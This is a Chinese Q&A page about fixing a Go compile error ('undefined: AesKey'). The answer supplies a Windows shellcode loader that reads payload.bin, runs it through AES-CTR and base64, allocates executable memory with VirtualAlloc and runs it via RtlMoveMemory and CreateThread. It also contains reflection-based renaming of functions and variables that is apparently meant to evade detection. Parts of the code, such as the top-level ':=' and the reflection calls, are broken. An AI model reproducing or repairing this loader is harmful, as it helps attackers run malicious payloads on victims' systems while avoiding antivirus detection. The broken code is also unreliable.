Go语言代码编译报错: undefined: AesKey
问题出在对于变量'AesKey'的定义和使用上。在main函数中使用'AesKey'时,需要先进行定义,但是定义语句放在了main函数中的其他语句之后。同时,在Encode和Decode函数中,也需要使用'AesKey',但是这些函数并没有传入'AesKey'作为参数,而是直接使用了未定义的'AesKey'变量。解决方法是将'AesKey'的定义放在函数外部,或者将'AesKey'作为参数传入函数中。
package main
import ( 'crypto/aes' 'crypto/cipher' 'encoding/base64' 'io/ioutil' 'reflect' 'strconv' 'syscall' 'time' 'unsafe' )
const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40 )
var ( kernel32 = syscall.NewLazyDLL("kernel32.dll") ntdll = syscall.NewLazyDLL("ntdll.dll") VirtualAlloc = kernel32.NewProc("VirtualAlloc") RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") CreateThread = kernel32.NewProc("CreateThread") )
varNames := [][]string{ {"AesKey", "key", "src", "block", "iv", "stream", "dst"}, {"cipher", "key", "src"}, {"src", "payloadBytes", "encodedBytes", "bdata"}, {"src", "decodedBytes", "payloadBytes"}, {"charcode", "addr", "handle"}, {"filename", "data"}, {"payload", "encodedPayload", "shellCodeHex"}, }
var AesKey = []byte{ 0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B, 0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B, 0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B, }
func AesCipher(key []byte, src []byte) []byte { block, _ := aes.NewCipher(key) iv := make([]byte, aes.BlockSize) stream := cipher.NewCTR(block, iv) dst := make([]byte, len(src)) stream.XORKeyStream(dst, src) return dst }
type CipherFunc func(key []byte, src []byte) []byte
func Crypt(cipher CipherFunc, key []byte, src []byte) []byte { return cipher(key, src) }
func Encode(src string) string { payloadBytes := []byte(src) encodedBytes := Crypt(AesCipher, AesKey, payloadBytes) bdata := base64.StdEncoding.EncodeToString(encodedBytes) return bdata }
func Decode(src string) []byte { decodedBytes, _ := base64.StdEncoding.DecodeString(src) payloadBytes := Crypt(AesCipher, AesKey, decodedBytes) return payloadBytes }
func exec(charcode []byte) { addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) time.Sleep(5) _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) time.Sleep(5) handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0) time.Sleep(5) syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE) }
func readFile(filename string) []byte { data, _ := ioutil.ReadFile(filename) return data }
func main() { funcNames := []string{"AesCipher", "Crypt", "Encode", "Decode", "exec", "readFile", "main"} for i, name := range funcNames { newName := "func" + strconv.Itoa(i) reflect.ValueOf(main).Elem().FieldByName(name).Set(reflect.ValueOf(newName)) }
for _, vars := range varNames {
for i, name := range vars {
newName := "var" + strconv.Itoa(i)
reflect.ValueOf(main).Elem().FieldByName(name).Set(reflect.ValueOf(newName))
}
}
payload := string(readFile("./payload.bin"))
encodedPayload := Encode(payload)
shellCodeHex := Decode(encodedPayload)
exec(shellCodeHex)
原文地址: https://www.cveoy.top/t/topic/lKKK 著作权归作者所有。请勿转载和采集!